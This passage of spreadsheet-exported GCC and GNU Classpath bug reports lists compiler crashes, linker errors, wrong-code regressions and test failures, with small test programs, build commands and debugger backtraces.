/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_8alphabet[_ZTV18AminoAcidsWithStop]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTV10AminoAcids[_ZTV10AminoAcids]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTV10AminoAcids[_ZTV10AminoAcids]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTV10AminoAcids[_ZTV10AminoAcids]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC10AminoAcids0_8alphabet[_ZTV10AminoAcids]+0x30): undefined reference to `typeinfo for alphabet'
/tmp/ccfEMWL0.o:(.rodata._ZTC10AminoAcids0_8alphabet[_ZTV10AminoAcids]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC10AminoAcids0_8alphabet[_ZTV10AminoAcids]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC10AminoAcids0_8alphabet[_ZTV10AminoAcids]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTV3RNA[_ZTV3RNA]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTV3RNA[_ZTV3RNA]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTV3RNA[_ZTV3RNA]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_11Nucleotides[_ZTV3RNA]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_11Nucleotides[_ZTV3RNA]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_11Nucleotides[_ZTV3RNA]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_8alphabet[_ZTV3RNA]+0x30): undefined reference to `typeinfo for alphabet'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_8alphabet[_ZTV3RNA]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_8alphabet[_ZTV3RNA]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC3RNA0_8alphabet[_ZTV3RNA]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTV3DNA[_ZTV3DNA]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTV3DNA[_ZTV3DNA]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTV3DNA[_ZTV3DNA]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_11Nucleotides[_ZTV3DNA]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_11Nucleotides[_ZTV3DNA]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_11Nucleotides[_ZTV3DNA]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_8alphabet[_ZTV3DNA]+0x30): undefined reference to `typeinfo for alphabet'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_8alphabet[_ZTV3DNA]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_8alphabet[_ZTV3DNA]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC3DNA0_8alphabet[_ZTV3DNA]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTV11Nucleotides[_ZTV11Nucleotides]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTV11Nucleotides[_ZTV11Nucleotides]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTV11Nucleotides[_ZTV11Nucleotides]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC11Nucleotides0_8alphabet[_ZTV11Nucleotides]+0x30): undefined reference to `typeinfo for alphabet'
/tmp/ccfEMWL0.o:(.rodata._ZTC11Nucleotides0_8alphabet[_ZTV11Nucleotides]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC11Nucleotides0_8alphabet[_ZTV11Nucleotides]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC11Nucleotides0_8alphabet[_ZTV11Nucleotides]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTI10AminoAcids[_ZTI10AminoAcids]+0x10): undefined reference to `typeinfo for alphabet'
/tmp/ccfEMWL0.o:(.rodata._ZTI11Nucleotides[_ZTI11Nucleotides]+0x10): undefined reference to `typeinfo for alphabet'
collect2: error: ld returned 1 exit status
All the errors go away if you change class alphabet to not have virtual public inheritance by removing the word virtual.</t>
  </si>
  <si>
    <t>benjamin.redelings</t>
  </si>
  <si>
    <t>GCC-423</t>
  </si>
  <si>
    <t>stage1/xgcc: Internal error: SEGV (program cc1) on gcc/tree.c</t>
  </si>
  <si>
    <t xml:space="preserve">	When building egcs-20000717 stage1/xgcc crashes on gcc/tree.c
Release:
2.96
Environment:
System: HP-UX europa B.10.20 A 9000/782 2008474542 two-user license
host: hppa2.0-hp-hpux10.20
build: hppa2.0-hp-hpux10.20
target: hppa2.0-hp-hpux10.20
How-To-Repeat:
	europa.stuart$ stage1/xgcc -v --save-temps -Bstage1/ -B/usr/local/hppa2.0-hp-hpux10.20/bin/ -c  -DIN_GCC    -W -Wall -Wtraditional -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -O2 -g -O2  -DHAVE_CONFIG_H    -I. -I/home/europa/stuart/egcs-20000717/gcc -I/home/europa/stuart/egcs-20000717/gcc/config -I/home/europa/stuart/egcs-20000717/gcc/../include /home/europa/stuart/egcs-20000717/gcc/tree.c  
Reading specs from stage1/specs
gcc version 2.96 20000717 (experimental)
 stage1ix__ -D__hppa -D__hp9000s800 -D__hp9k8 -D__PWB -D__hpux -D__unix -Asystem(unix) -Asystem(hpux) -Acpu(hppa) -Amachine(hppa) -D__OPTIMIZE__ -g -W -Wall -Wtraditional -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wno-long-long -pedantic -D_PA_RISC1_1 -D__hp9000s700 -D_HPUX_SOURCE -D_HIUX_SOURCE -D__STDC_EXT__ -DIN_GCC -DHAVE_CONFIG_H /home/europa/stuart/egcs-20000717/gcc/tree.c tree.i
GNU CPP version 2.96 20000717 (experimental) (cpplib)
 (hppa)
ignoring nonexistent directory /usr/local/hppa2.0-hps-20000717/gcc/config
 /home/europa/stuart/egcs-20000717/include
 include
 /usr/local/include
 /usr/include
End of search list.
 stage1/cc1 tree.i -quiet -dumpbase tree.c -g -O2 -O2 -W -Wall -Wtraditional -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wno-long-long -pedantic -version -o tree.s
cc1: warning: -g is only supported when using GAS on this processor
cc1: warning: -g option disabled.
GNU C version 2.96 20000717 (experimental) (hppa2.0-hp-hpux10.20) compiled by GNU C version 2.8.1.
xgcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.
See  for instructions.
See attachments for tree.i.bz2
</t>
  </si>
  <si>
    <t>stuart</t>
  </si>
  <si>
    <t>GCC-61780</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Wrong code when shifting elements of a multidimensional array</t>
  </si>
  <si>
    <t>From https://groups.google.com/forum/#!topic/comp.lang.fortran/mfS-BB2X-90 the following code gives a wrong result at run time
program prgm3 
    implicit none 
    integer parameter :: n = 10 k = 3 
    integer :: i j 
    integer dimension(nn) :: y 
    integer :: res1(n) res2(n)
1   format(10i5) 
!initialize 
    do i=1n 
        do j=1n 
            y(ij) = n*i + j 
        end do 
    end do 
    res2 = y(k:) 
!shift right 
    y(k4:n) = y(k3:n-1) 
    y(k3) = 0 
    res1 = y(k:)
    y(k:) = res2
    y(kn:4:-1) = y(kn-1:3:-1) 
    y(k3) = 0 
    res2 = y(k:) 
    print * res1
    print * res2
    if (any(res1 /= res2)) call abort () 
end program prgm3 
Revision r174295 (2011-05-26) is OK r174338 (2011-05-27) is not likely r174302 (pr48955).</t>
  </si>
  <si>
    <t>GCC-1671</t>
  </si>
  <si>
    <t>i960gcc crashes when run with Cygnus 1.0 (ok with B20)</t>
  </si>
  <si>
    <t>When i960gcc is run on very large source files it crashes. Example files attached.
Release:
1.0
Environment:
Windows NT 4.00.1381 Dual-Pentium
How-To-Repeat:
Type the following:
    pkzip -extract omtognats
    go</t>
  </si>
  <si>
    <t>dstevens</t>
  </si>
  <si>
    <t>GCC-43291</t>
  </si>
  <si>
    <t>[4.5 regression] [OOP] Type mismatch in argument passed CLASS(t1) to CLASS(t2)</t>
  </si>
  <si>
    <t>This is a spin-off from PR42769 comment #17. The test case has been extracted from comment #1 in that PR. It was working before r157272 (which fixed PR43256) but fails now:
module m1
  type  :: t1
  contains 
    procedure :: sizeof
  end type
contains
  integer function sizeof(a)
    class(t1) :: a
  end function sizeof
end module
module m2
  use m1
  type extends(t1) :: t2    
  contains
    procedure :: sizeof =&gt; sizeof2
  end type
contains
  integer function sizeof2(a)
    class(t2) :: a
  end function
end module
module m3
  use m2
  type :: t3
    class(t1) allocatable  :: a 
  contains
    procedure :: sizeof =&gt; sizeof3
  end type
contains 
  integer function sizeof3(a)
    class(t3) :: a
    sizeof3 = a%a%sizeof()
  end function 
end module
    sizeof3 = a%a%sizeof()
              1
Error: Type mismatch in argument 'a' at (1) passed CLASS(t1) to CLASS(t2)</t>
  </si>
  <si>
    <t>GCC-9286</t>
  </si>
  <si>
    <t>version information not supplied</t>
  </si>
  <si>
    <t>running /usr/local/lib/libstdc++.so causes a Segmentation fault -&gt; version information not supplied
Release:
3.2.1
Environment:
linux 2.4.18 i686</t>
  </si>
  <si>
    <t>GCC-19093</t>
  </si>
  <si>
    <t>g++.dg/opt/max1.C fails on ia64 and x86_64</t>
  </si>
  <si>
    <t>g++.dg/opt/max1.C still failed on both Linux/ia64 and Linux/x86_64:
http://gcc.gnu.org/ml/gcc-testresults/2004-12/msg00919.html
http://gcc.gnu.org/ml/gcc-testresults/2004-12/msg00923.html
They are both 64bit targets.</t>
  </si>
  <si>
    <t>GCC-37731</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] long long may not work correctly on 32bit host</t>
  </si>
  <si>
    <t>On Linux/ia32 gcc 4.4 gave:
[hjl@gnu-31 longlong-2]$ cat y.c
#include 
extern void abort ()
unsigned long long xh = 1ull
int
main ()
{
  unsigned long long yh = 0xffffffffull
  unsigned long long z = xh * yh
  unsigned long long i = 1ull * yh
  printf (%llx\n i)
  printf (%llx\n z)
  if (z != i)
    abort ()
}
[hjl@gnu-31 longlong-2]$ gcc -m32 -O y.c
[hjl@gnu-31 longlong-2]$ ./a.out 
ffffffff
ffffffffffffffff
Aborted
[hjl@gnu-31 longlong-2]$ 
On Linux/Intel64 I got
[hjl@gnu-6 longlong-2]$ gcc -m32 -O y.c
[hjl@gnu-6 longlong-2]$ ./a.out 
ffffffff
ffffffff
[hjl@gnu-6 longlong-2]$ 
On 32bit hosts we didn't handle unsigned long long properly.</t>
  </si>
  <si>
    <t>GCC-46768</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.target/i386/pr37434-[24].c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 167375 gave:
FAIL: gcc.target/i386/pr37434-2.c scan-assembler pinsrw
FAIL: gcc.target/i386/pr37434-4.c scan-assembler pinsrb</t>
  </si>
  <si>
    <t>CLASSPATH-22672</t>
  </si>
  <si>
    <t>dummy implementation of getLocalGraphicsEnvironment</t>
  </si>
  <si>
    <t xml:space="preserve">Regarding to JAPITests like used with kaffe (http://www.kaffe.org/compatibility_japitools.shtml) this should be ok but it's only a dummy: throw new Error(not implemented)
</t>
  </si>
  <si>
    <t>GCC-22309</t>
  </si>
  <si>
    <t>mt allocator doesn't pthread_key_delete its keys</t>
  </si>
  <si>
    <t>With libstdc++ configured with --enable-libstdcxx-allocator=mt (on 4.0 branch
or on HEAD for linux even without it as mt is the default there) following
testcase crashes:
cat &gt; O.c &lt;&lt;EOF
#include 
#include 
void *
tf (void *arg)
{
  void *h = dlopen (./libO.so RTLD_LAZY)
  void (*fn) (void)
  if (!h) return 0
  fn = dlsym (h foo)
  fn ()
  dlclose (h)
  return 0
}
int
main (void)
{
  pthread_t th
  pthread_create (
  pthread_join (th NULL)
  return 0
}
EOF
cat &gt; libO.C &lt;&lt;EOF
#include 
extern C void
foo (void)
{
  std::string s
  s += hello
}
EOF
g++ -g -O2 -shared -fpic -o libO.so libO.C
gcc -g -O2 -o O O.c -ldl -lpthread
The problem is that __gnu_cxx::__pool::_M_initialize () calls
pthread_key_create but doesn't ensure pthread_key_delete is called when
libstdc++.so is unloaded.  So when glibc attempts destroys a thread or program
and calls the registered key cleanup routine (_S_destroy_thread_key) if
libstdc++.so is not mapped at that moment any longer either whatever other
code happens to be mapped at that address is run or the program crashes
immediately.
mt_allocator.cc should ensure that gthread_key_delete is called on the key
after all users of the key have been destroyed.</t>
  </si>
  <si>
    <t>GCC-59825</t>
  </si>
  <si>
    <t>Many cilkplus test failures</t>
  </si>
  <si>
    <t>On Linux/x86 revision 206621 gave:
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -g -O0 -std=c99 (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -g -O0 -std=c99 (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -O2 -std=c99 (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -O2 -std=c99 (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -O3 -std=c99 (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -O3 -std=c99 (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -std=c99 (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus -std=c99 (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -fcilkplus (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -g -fcilkplus (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -g -fcilkplus (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -g -O2 -ftree-vectorize -fcilkplus (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -g -O2 -ftree-vectorize -fcilkplus (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -O1 -fcilkplus (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -O1 -fcilkplus (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -O2 -fcilkplus (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -O2 -fcilkplus (test for excess errors)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -O3 -fcilkplus (internal compiler error)
FAIL: c-c++-common/cilk-plus/AN/rank_mismatch2.c  -O3 -fcilkplus (test for excess errors)
Revision 206615 is OK.</t>
  </si>
  <si>
    <t>bviyer</t>
  </si>
  <si>
    <t>GCC-12417</t>
  </si>
  <si>
    <t>Bad error message</t>
  </si>
  <si>
    <t>Error in template expansion reported at template invocation location not at error point in template text. Needs usual instantiated from chain.</t>
  </si>
  <si>
    <t>GCC-70147</t>
  </si>
  <si>
    <t>[6 Regression] testcase from hana testsuite gets miscompiled with -fsanitize=undefined</t>
  </si>
  <si>
    <t>Created attachment 37901
unreduced testcase
markus@x4 printable % g++ -g -O2 metafunction.ii
markus@x4 printable % ./a.out
markus@x4 printable % clang++ -std=c++14 -g -O2 -fsanitize=undefined metafunction.ii
markus@x4 printable % ./a.out
markus@x4 printable % g++ -g -O2 -fsanitize=undefined metafunction.ii
markus@x4 printable % gdb ./a.out
Reading symbols from ./a.out...done.
(gdb) run
Starting program: /var/tmp/hana/test/experimental/printable/a.out 
[Thread debugging using libthread_db enabled]
Using host libthread_db library /lib/libthread_db.so.1.
Program received signal SIGSEGV Segmentation fault.
0x0000000000410522 in std::basic_istream &gt;::basic_istream (__vtt_parm= this= __in_chrg=)
    at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/istream:606
606           basic_istream()
(gdb) bt
#0  0x0000000000410522 in std::basic_istream &gt;::basic_istream (__vtt_parm= this= __in_chrg=)
    at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/istream:606
#1  std::__cxx11::basic_istringstream std::allocator &gt;::basic_istringstream (__mode=std::_S_in __str=2 this=0x7fffffffd910 
    __in_chrg= __vtt_parm=) at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/sstream:423
#2  std::__cxx11::regex_traits::value (this=this@entry=0x7fffffffdb30 __ch=__ch@entry=50 '2' __radix=__radix@entry=10)
    at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/bits/regex.tcc:347
#3  0x00000000004122b7 in std::__cxx11::match_results std::allocator &gt; &gt; std::allocator std::allocator &gt; &gt; &gt; &gt; &gt;::format std::allocator &gt; &gt; &gt; (this=this@entry=0x7fffffffdd00 __out=... 
    __fmt_first= __fmt_first@entry=0x4833f4 $2 __flags@entry=(unknown: 0))
    at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/bits/regex.tcc:437
#4  0x000000000044a80c in std::regex_replace std::allocator &gt; &gt; __gnu_cxx::__normal_iterator std::allocator &gt; &gt; std::__cxx11::regex_traits char&gt; (__out=__out@entry=... 
    __first= __first@entry=98 'b' __last= 
    __e=... __fmt=__fmt@entry=0x4833f4 $2&lt; __flags=__flags@entry=(unknown: 0)) at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/bits/regex.tcc:481
#5  0x00000000004055ab in std::regex_replace char std::char_traits std::allocator &gt; (__flags=(unknown: 0) 
    __fmt=0x4833f4 $2) at /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/bits/regex.h:2366
#6  boost::hana::experimental::print_detail::strip_type_junk (str=boost::hana::template_t)
    at /var/tmp/hana/include/boost/hana/experimental/printable.hpp:90
#7  0x0000000000403a4d in boost::hana::experimental::print_impl void&gt;::apply &gt; ()
    at /var/tmp/hana/include/boost/hana/experimental/printable.hpp:228
#8  boost::hana::experimental::print_t::operator() &gt; (this= t=)
    at /var/tmp/hana/include/boost/hana/experimental/printable.hpp:74
#9  main () at metafunction.cpp:22</t>
  </si>
  <si>
    <t>GCC-13667</t>
  </si>
  <si>
    <t>GCJ crashes on compilation</t>
  </si>
  <si>
    <t>When I try to compile java sources I get following error:
max@barracuda:~/misc/xmage$ gcj -save-temps xmage/math/Point2f.java
xmage/math/Point2f.java:412: internal compiler error: in make_class_data at
java/class.c:1609
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
GCJ version:
max@barracuda:~$ gcj -v
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.3/specs
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.3/../../../libgcj.spec
rename spec lib to liborig
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.3 20040110 (prerelease) (Debian)
System:
max@barracuda:~$ uname -a
Linux barracuda 2.4.20-1-686 #1 Sat Mar 22 13:16:21 EST 2003 i686 GNU/Linux
Project page: http://yellowhedgehog.com/xmage/
ViewCVS: http://cvs.sourceforge.net/viewcvs.py/xmage/xmage/
I'll be glad provide any other necessary data when requested.
Max</t>
  </si>
  <si>
    <t>gilead</t>
  </si>
  <si>
    <t>GCC-5953</t>
  </si>
  <si>
    <t xml:space="preserve"> Rainer Orth  writes:
 &gt; a (completely unnecessary) regression from GCC 3.0.x.
     ^^^^^^^^^^^^^^^^^^^^^^^^
 The old shs.cc assumed that an unsigned int was 32 bits. This is
 broken. To my knowledge it can only be fixed robustly on platforms
 with proper (C99-compliant) headers.
 It seems that you know of another way to fix the problem which will
 work on systems lacking proper headers. Could you please post a patch
 containing your suggested fix?
 Thanks!
   - a
 -- 
 If I put copyrighted material into the 'chewy nougat center' I can
  claim the crunchy chocolate coating is an 'Access Control
  Mechanism'.                                     --lynx_user_abroad
 Why Windows NT/2k/XP is unreliable: www.zappadoodle.com
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-22215</t>
  </si>
  <si>
    <t>[3.4 Regression] [unit-at-a-time] g++ -O2 generates Undefined Global for statically defined function</t>
  </si>
  <si>
    <t>/* g++ -O2 puts Undefined Global reference for statically defined function */
char *v
static int server1(){ return 0 }
void func(){ (v?v:(v=0))[server1()] }
Save the above into n.c and compile it with g++ -O2 -c n.c then the
n.o includes Undefined Global __Z7server1v for statically defined
function server1().  I saw this problem in g++ 3.4.2 and 3.4.4.
In other versions the function is expanded inline by default.</t>
  </si>
  <si>
    <t>ysato</t>
  </si>
  <si>
    <t>CLASSPATH-22791</t>
  </si>
  <si>
    <t>Missing javax.swing.JTextField.getKeymap()</t>
  </si>
  <si>
    <t xml:space="preserve">When I'm trying to compile the JBofh client of the
Cerebrum project (cerebrum.sourceforge.net) the build
fail because javax.swing.JTextField.getKeymap() is missing.
Please implement this function.
I found a documentation for this function on
.
It is inherited from JTextComponent.
</t>
  </si>
  <si>
    <t>GCC-68169</t>
  </si>
  <si>
    <t>s-osinte-rtems.ads is out of synch with type definitions of current newlib</t>
  </si>
  <si>
    <t>For rtems the type definition of phtread_attr_t in s-osinte-rtems.ads and the corresponding one of current newlib are not equivalent.
Thus not enough memory is reserved by ada for this type and the call to the initializer will cause a stack corruption at least for arm-rtems4.11-targets.
I have tested the problem with the gcc4_9-branch and will provide a patch.
The rtems-developers are aware of the problem.</t>
  </si>
  <si>
    <t>soja-lists</t>
  </si>
  <si>
    <t>GCC-49847</t>
  </si>
  <si>
    <t>[4.8 Regression] NULL deref in fold_rtx (prev_insn_cc0 == NULL)</t>
  </si>
  <si>
    <t>Forwarding from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=633754
Trying to bootstrap gcj-4.6 on Debian/m68k (gcj-4.4 and gcc-4.6 work fine).
Reproducible ICE trying to build the runtime library after bootstrapping passed:
/bin/bash ./libtool --tag=GCJ   --mode=compile /tmp/buildd/gcj-4.6-4.6.1/build/./gcc/gcj -B/tmp/buildd/gcj-4.6-4.6.1/build/m68k-linux-gnu/m68040/libjava/ -B/tmp/buildd/gcj-4.6-4.6.1/build/m68k-linux-gnu/m68040/libjava/ -B/tmp/buildd/gcj-4.6-4.6.1/build/./gcc/ -B/usr/m68k-linux-gnu/bin/ -B/usr/m68k-linux-gnu/lib/ -isystem /usr/m68k-linux-gnu/include -isystem /usr/m68k-linux-gnu/sys-include  -m68040 -fclasspath= -fbootclasspath=../../../../src/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2  -m68040  -c -o java/util.lo -fsource-filename=/tmp/buildd/gcj-4.6-4.6.1/build/m68k-linux-gnu/m68040/libjava/classpath/lib/classes -MT java/util.lo -MD -MP -MF java/util.deps @java/util.list
/tmp/buildd/gcj-4.6-4.6.1/src/libjava/classpath/java/util/Random.java:427:0: internal compiler error: Segmentation fault
This is still a cc0 architecture as the problem is:
Program received signal SIGSEGV Segmentation fault.
equiv_constant (x=0x0) at ../../src/gcc/cse.c:3812
3812      if (REG_P (x)
(gdb) bt
#0  equiv_constant (x=0x0) at ../../src/gcc/cse.c:3812
#1  0x804b0542 in fold_rtx (x=0xc83cb5f4 insn=0xc83cc1c0) at ../../src/gcc/cse.c:3274
#2  0x804b05fe in fold_rtx (x=0xc83c4f30 insn=0xc83cc1c0) at ../../src/gcc/cse.c:3279
#3  0x804b35ec in cse_insn (insn=0xc83cc1c0) at ../../src/gcc/cse.c:4511
[â€¦]
(gdb) frame 1
#1  0x804b0542 in fold_rtx (x=0xc83cb5f4 insn=0xc83cc1c0) at ../../src/gcc/cse.c:3274
3274                const_arg = equiv_constant (folded_arg)
(gdb) list
3269
3270    #ifdef HAVE_cc0
3271              case CC0:
3272                folded_arg = prev_insn_cc0
3273                mode_arg = prev_insn_cc0_mode
3274                const_arg = equiv_constant (folded_arg)
3275                break
3276    #endif
3277
3278              default:
(gdb) print folded_arg
$1 = (rtx) 0x0
(gdb) print prev_insn_cc0
$2 = (rtx) 0x0
(gdb) print prev_insn_cc0_mode
$3 = VOIDmode
More information in the linked bug report.</t>
  </si>
  <si>
    <t>tg</t>
  </si>
  <si>
    <t>GCC-64091</t>
  </si>
  <si>
    <t>[5 Regression] ICE in update_debug_stmt at tree-ssa-tail-merge.c:1620</t>
  </si>
  <si>
    <t>Created attachment 34129
TC (compile with -O2 -fvar-tracking-assignments)
GCC 5.0.0 20141123 (experimental)
1.c: In function 'main':
1.c:3:5: internal compiler error: in update_debug_stmt at tree-ssa-tail-merge.c:1620
 int main(void)
     ^
0x8913666 update_debug_stmt
	../../gcc-5/gcc/tree-ssa-tail-merge.c:1620
0x8913666 update_debug_stmts
	../../gcc-5/gcc/tree-ssa-tail-merge.c:1656
0x8913666 tail_merge_optimize(unsigned int)
	../../gcc-5/gcc/tree-ssa-tail-merge.c:1729
0x88c88bb execute
	../../gcc-5/gcc/tree-ssa-pre.c:4848</t>
  </si>
  <si>
    <t>GCC-9040</t>
  </si>
  <si>
    <t>c++filt doesn't decode the names of class initialization functions</t>
  </si>
  <si>
    <t>I got the function name 'org.apache.catalina.startup.ContextConfig.__U3c_clinit__U3e_' in an exception report but I beleive it should say 'org.apache.catalina.startup.ContextConfig.'
Release:
gcc-3.2
Environment:
Red Hat Linux 8.0</t>
  </si>
  <si>
    <t>GCC-39007</t>
  </si>
  <si>
    <t>-ftree-loop-distribution ICEs</t>
  </si>
  <si>
    <t>Consider:
void
foo (int *__restrict__ p int *__restrict__ q int count)
{
  while (--count &gt;= 0)
    {
      *p++ = 0
      *q++ = 0
    }
}
I get:
$ ./cc1 -quiet -O2 -ftree-loop-distribution min.c
min.c: In function 'foo':
min.c:2: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is as of Revision 143741 which is after the fix for PR
tree-optimization/38997 has gone in:
http://gcc.gnu.org/ml/gcc-cvs/2009-01/msg00752.html
FWIW if I try:
void
foo (int *__restrict__ p int *__restrict__ q int count)
{
  int i
  for (i = 0 i &lt; count i++)
    {
      *p++ = 0
      *q++ = 0
    }
}
I get:
*** glibc detected *** ./cc1: malloc(): memory corruption: 0xf7efd160 ***
I am guessing that depending on the exact memory allocation pattern
different parts of memory get corrupted.</t>
  </si>
  <si>
    <t>GCC-40724</t>
  </si>
  <si>
    <t>[LTO] ICE in lto_get_pickled_tree at lto-streamer-in.c:2389</t>
  </si>
  <si>
    <t>At -O0 -flto with
t1.f
      subroutine f
        print * Hello World
      end
t2.f
      program test
      call f
      end
the reader ICEs with
lto1: internal compiler error: in lto_get_pickled_tree at lto-streamer-in.c:2389
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-68896</t>
  </si>
  <si>
    <t>[ARM] target attribute ignored</t>
  </si>
  <si>
    <t>Hi
With a modified version of attr-neon3.c it seems that the 1st target attribute is ignored.
===============================
/* { dg-do compile } */
/* { dg-require-effective-target arm_crypto_ok } */
/* { dg-require-effective-target arm_fp_ok } */
/* { dg-options -O2 } */
/* { dg-add-options arm_fp } */
/* Reset fpu to a value compatible with the next pragmas.  */
#pragma GCC target (fpu=vfp)
#pragma GCC push_options
#include 
/* Check that neon is used.  */
int8x8_t __attribute__ ((target(fpu=neon)))
my (int8x8_t __a int8x8_t __b)
{
  return __a + __b
}
/* Check that crypto builtins are recognized.  */
poly128_t __attribute__ ((target(fpu=crypto-neon-fp-armv8)))
foo (poly128_t* ptr)
{
  return vldrq_p128 (ptr)
}
